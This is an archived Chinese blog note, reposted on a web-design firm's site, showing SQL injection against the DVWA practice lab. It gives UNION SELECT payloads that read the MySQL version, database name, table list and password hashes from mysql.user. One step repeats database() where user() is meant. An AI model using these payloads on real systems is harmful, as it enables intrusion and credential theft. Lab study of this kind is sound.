尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

【2014-04-27】SQL注入DVWA

【2014-04-27】SQL注入DVWA [历史归档]本文原发布于 cstriker1407.info 个人博客内容为历史存档仅供参考。发布时间2014-04-27 标题SQL注入DVWA分类操作系统 / 安全 标签DVWA·SQL注入SQL注入DVWA检测是否可以注入注入测试笔记仅供学习交流使用请勿进行其他用途检测是否可以注入首先我们试下正常的数据返回是可以的。然后试下能否注入:#’ or ‘1’ 1发现可以注入而且可以得到SQL返回的是两列数据。注入测试然后就可以查询MySQL的版本#’ union select null, version()#MySQL的当前的用户 **#’ union select null, database()#**发现是root非常危险。查询当前的数据库#’ union select null, database()#获取了数据库的版本我们就可以自己建立一个MySQL然后在本地先生成一个SQL语句然后进行有目的注入。如下查询所有的表在本地的MySQL环境中的语句是那么我们的注入语句就是#’ union SELECT NULL, TABLES.TABLE_NAME FROM information_schema.TABLES #我们希望获取用户的密码表先在本地生成语句然后构造#’ union SELECT user, password FROM mysql.user #取到了密码就可以尝试破解了。
返回列表